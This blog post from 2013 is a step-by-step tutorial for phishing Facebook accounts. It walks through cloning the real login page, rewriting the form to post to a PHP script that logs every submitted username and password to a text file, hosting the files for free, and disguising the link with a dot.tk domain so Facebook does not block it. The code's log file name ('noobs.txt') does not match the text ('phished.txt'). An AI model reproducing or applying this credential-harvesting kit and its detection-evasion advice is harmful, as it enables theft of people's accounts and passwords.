Wednesday, 25 December 2013

How To Hackers Hack FaceBook Account Using Phishing Attack

WHAT IS PHISHING?
Phishing is a technique or a way of attempting to acquire sensitive or confidential information such as usernames, passwords, and credit card details by false pretense as a trustworthy entity in an electronic communication. This is done with the help of a phisher.


WHAT IS A PHISHER?
A phisher is something that looks exactly like an Original login page (fake page), that writes the victim's login data (Username and Password) to a specific file, or does whatever you want so long as you get access to the victim's login data.
Here is an example of a fake facebook login page (phisher)




 HOW TO MAKE A PHISHER?
As the saying goes:

  • Dont give plenty of FISH to your friend,. Instead, you should teach him how to PHISH 

Therefore, instead of  just giving you the download link to the already made phishing page,.. Am going to teach you how to make your own phishing page. Well, at the end of this tutorial, i will put a download link to my already made phishing pages but first you have to learn how to make your own phisher :D

To create a successful phisher, all you need is a PHP enabled siteNotepad on your computer and a brain.

You can download Notepad v5.9++ here

Here is a list of php enabled free hosting sites:



In this tutorial am going to fucus mainly on how to prepare a phishing attack on facebook, am going to use Mozilla firefox as the browser and http://my3gb.com as the hosting site, its much easier.

STEP 1 -Creating the fake page

  • Go to facebook's login page http://www.facebook.com
  • On the top left corner of your Firefox browser, Click File ->Save page As and save your page name as facebook.html
  • Open facebook.html Using Notepad and search for the word ''action''

You will find it on a line that looks like this;

class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form"

  • Now change the method to ''get'' and action to ''login.php'' so that you will have something that looks like this;
class="menu_login_container"><form method="get" action="login.php" id="login_form"


STEP 2- Preparing the php script
  • To Create a php file, simply pasting the code below into your notepad. Then save it as login.php

------------------------------------------------------------------------------
<?php
header("Location: http://facebook.com/login.php ");
$handle = fopen("noobs.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


------------------------------------------------------------------------------

 Note that in the above script, ''phished.txt'' is the file on which all hacked usernames and passwords will be saved and ''https://facebook.com/login.php'' is the Original facebook url where your victim will be redircted to after clicking the login button on your fake page. But at the moment facebook has tightened its security where by your victim will get notified of a phishing attack and would therefore be prompted to change his password right after arriving from a phishing page.

To avoid this, you should redirect your victim to any other url which is not of facebook by replacing  https://facebook.com/login.php with any url. Choosing the url to redirect your victim to will all depend on the trick that you will use against your victim in the whole phishing proccess.

Please also note that this part is mainly for facebook , its ok with several other sites like gmail, hotmail e.t.c your victim will not get a warning message, including mobile facebook (http://m.facebook.com).

STEP 3- Create File where to save hacked passwords 
  • Create an empty text file using notepad and rename it as phished
Note that when creating the text file, there is no need of renaming it as phished.txt because the fact that you will save it as a text file is enough to make it bear the extension of txt

Now you have 3 files so far;
  1. facebook.html
  2. login.php
  3. phished.txt
 STEP 5- Uploading the 3 files

Now go to http://my3gb.com and sign up for a free hosting account the upload the 3 files
If your phisher has successfully been made, any email address and passwords that are typed on your fake page will be saved on the ''phished.txt'' file



The link to your phishing page will therefore be; 
www.yourusername.my3gb.com/facebook.html

NOTE THAT:

  1. No One will be so dumb to click on such a link
  2. Facebook will automaticaly block your phishing url from being posted on facebook
To overcome the above sitiuation you need to rename your phishing link using a ''dot.tk'' domain. To be able to do this, go to www.dot.tk and register,. After that, login to your account and click on ''Add a new free domain now'' and follow the rest of the steps.

Your dot.tk domain name will look like this,... www.anyname.tk , any clicks on this link will be fowarded to your fake facebook page.
The good part is that..
 
  • you can rename the phishing link to suite your victim's curiosity and there making it difficult for him to notice any phisher
  • Your phisher will NOT be detected and blocked by facebook,..so you are free to post it or send it to a freind on facebook via inbox.

Hope you enjoyed the tutorial,.

No comments:

Post a Comment